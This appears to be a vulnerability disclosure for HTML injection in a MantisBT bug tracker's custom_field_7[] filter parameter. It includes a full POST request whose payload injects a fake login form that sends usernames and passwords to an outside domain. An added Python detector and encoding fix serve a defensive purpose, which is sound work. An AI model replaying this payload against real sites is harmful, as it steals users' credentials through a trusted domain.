https://bugs.fuzzing-project.org/view_all_set.php?f=3
Because the value submitted in the custom_field_7[] field is not properly sanitized, an attacker could send emails to the company's customers pointing to the legitimate fuzzing project domain, where they are prompted for data. The chance of successful phishing is excellent because the form appears within the company's own domain.
The injected content could be a form that requests information and sends it to an external domain.
POST /view_all_set.php?f=3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://bugs.fuzzing-project.org/
Cookie: MANTIS_secure_session=0;MANTIS_collapse_settings=|sidebar:1|filter:1;PHPSESSID=1495fp23866b0m12bi541et8c7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1947
Host: bugs.fuzzing-project.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

category_id[]=0&custom_field_1[]=0&custom_field_2[]=0&custom_field_3[]=0&custom_field_4[]=0&custom_field_5[]=0&custom_field_6[]=0&custom_field_7[]=0'"()%26%25"'</td>--><div><div><div><div><h4><i></i>Inicio de sesión</h4><div></div><form id="login-form" method="post" action="https://www.dragonjar.org"><fieldset><label for="username" class="block clearfix"><span><input id="username" name="username" type="text" placeholder="Nombre de usuario" size="32" maxlength="191" value="" class="form-control autofocus"><i></i></span></label><label for="password" class="block clearfix"><span><input id="password" name="password" type="password" placeholder="Contraseña" size="32" maxlength="1024" class="form-control autofocus"><i></i></span></label><div></div><input type="submit" class="width-40 pull-right btn btn-success btn-inverse bigger-110" value="Iniciar sesión" /></fieldset></form></div>
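Added example (not part of the original report, and not MantisBT code): a Python check that parses a form-encoded body like the one above and flags any parameter whose value carries an HTML form posting to a host other than the site's own, together with the output-encoding step that neutralises such a value when it is reflected. The names FormFinder, audit_body and render_filter_value, the sample body and the host collector.example are assumptions made for the illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Constructed sample modelled on the request above; collector.example is a placeholder.
SAMPLE_BODY = (
    "category_id[]=0&custom_field_6[]=0&custom_field_7[]=0'\"</td>-->"
    '<form method="post" action="https://collector.example/">'
    '<input name="username" type="text">'
    '<input name="password" type="password"></form>'
)


class FormFinder(HTMLParser):
    """Collects form actions and password inputs found in one parameter value."""

    def __init__(self):
        super().__init__()
        self.actions, self.password_inputs = [], 0

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "form":
            self.actions.append(attr.get("action") or "")
        elif tag == "input" and (attr.get("type") or "").lower() == "password":
            self.password_inputs += 1


def audit_body(body, site_host):
    """Return (param, action_host, asks_password) for forms that post off-site."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        finder = FormFinder()
        finder.feed(value)
        finder.close()
        for action in finder.actions:
            host = urlsplit(action).hostname
            if host and host != site_host:
                findings.append((name, host, finder.password_inputs > 0))
    return findings


def render_filter_value(value):
    """Mitigation side: HTML-encode the value before reflecting it into the page."""
    return escape(value, quote=True)


if __name__ == "__main__":
    print(audit_body(SAMPLE_BODY, "bugs.fuzzing-project.org"))
```

The detection half suits request logs or a WAF rule review; the encoding half is the actual fix, since a value rendered through it shows up as inert text instead of markup.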